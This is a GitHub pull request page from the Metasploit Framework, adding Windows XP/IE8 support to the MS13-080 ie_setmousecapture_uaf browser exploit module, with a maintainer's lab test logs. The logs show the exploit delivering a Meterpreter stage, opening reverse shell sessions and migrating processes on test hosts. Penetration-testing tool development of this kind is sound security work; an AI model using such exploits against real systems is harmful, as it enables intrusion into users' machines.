win XP IE8 exploit for MS13-080 #4213

Merged
merged 2 commits into from Dec 3, 2014
@webstersprodigy webstersprodigy commented Nov 15, 2014

ie_setmousecapture_uaf only supported IE9 on Windows 7, but the vuln was present in different versions of IE. I tested with Windows XP SP3 and IE8 and the exploit works pretty reliably (included the specific mshtml version in the code). I did not test that I did not break the Win7 IE9 exploit as I didn't have that setup (but there shouldn't be anything changed).

This pull request is probably not very useful in real life - I was just messing around.

@wchen-r7 wchen-r7 added the module label Nov 16, 2014
@wchen-r7 wchen-r7 self-assigned this Nov 16, 2014
@todb-r7 todb-r7 added the feature label Nov 17, 2014
@wchen-r7 wchen-r7 commented Nov 22, 2014

I have not forgotten this PR. Want to do this but occupied with other stuff atm.

@wchen-r7 wchen-r7 commented Dec 3, 2014

Tested:

IE9:

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://0.0.0.0:8080/mtAFOHcX6lJL
[*]  Local IP: http://10.6.0.118:8080/mtAFOHcX6lJL
[*] Server started.
[*] 10.6.0.209       ie_setmousecapture_uaf - Gathering target information.
[*] 10.6.0.209       ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 10.6.0.209
[*] Meterpreter session 1 opened (10.6.0.118:4444 -> 10.6.0.209:49203) at 2014-12-03 13:43:56 -0600
[*] Session ID 1 (10.6.0.118:4444 -> 10.6.0.209:49203) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (2420)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1088
[+] Successfully migrated to process 

msf exploit(ie_setmousecapture_uaf) >

IE8 (XP):

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://172.16.23.1:8080/AcUinEiHgAWdsWM
[*] Server started.
[*] 172.16.23.129    ie_setmousecapture_uaf - Gathering target information.
[*] 172.16.23.129    ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 172.16.23.129
[*] Meterpreter session 3 opened (172.16.23.1:4444 -> 172.16.23.129:1951) at 2014-12-03 14:10:42 -0600
[*] Session ID 3 (172.16.23.1:4444 -> 172.16.23.129:1951) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2252
[+] Successfully migrated to process 
wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this pull request Dec 3, 2014
Conflicts:
	modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@wchen-r7 wchen-r7 merged commit 27d5ed6 into rapid7:master Dec 3, 2014
1 check passed
continuous-integration/travis-ci The Travis CI build passed
wchen-r7 added a commit that referenced this pull request Dec 3, 2014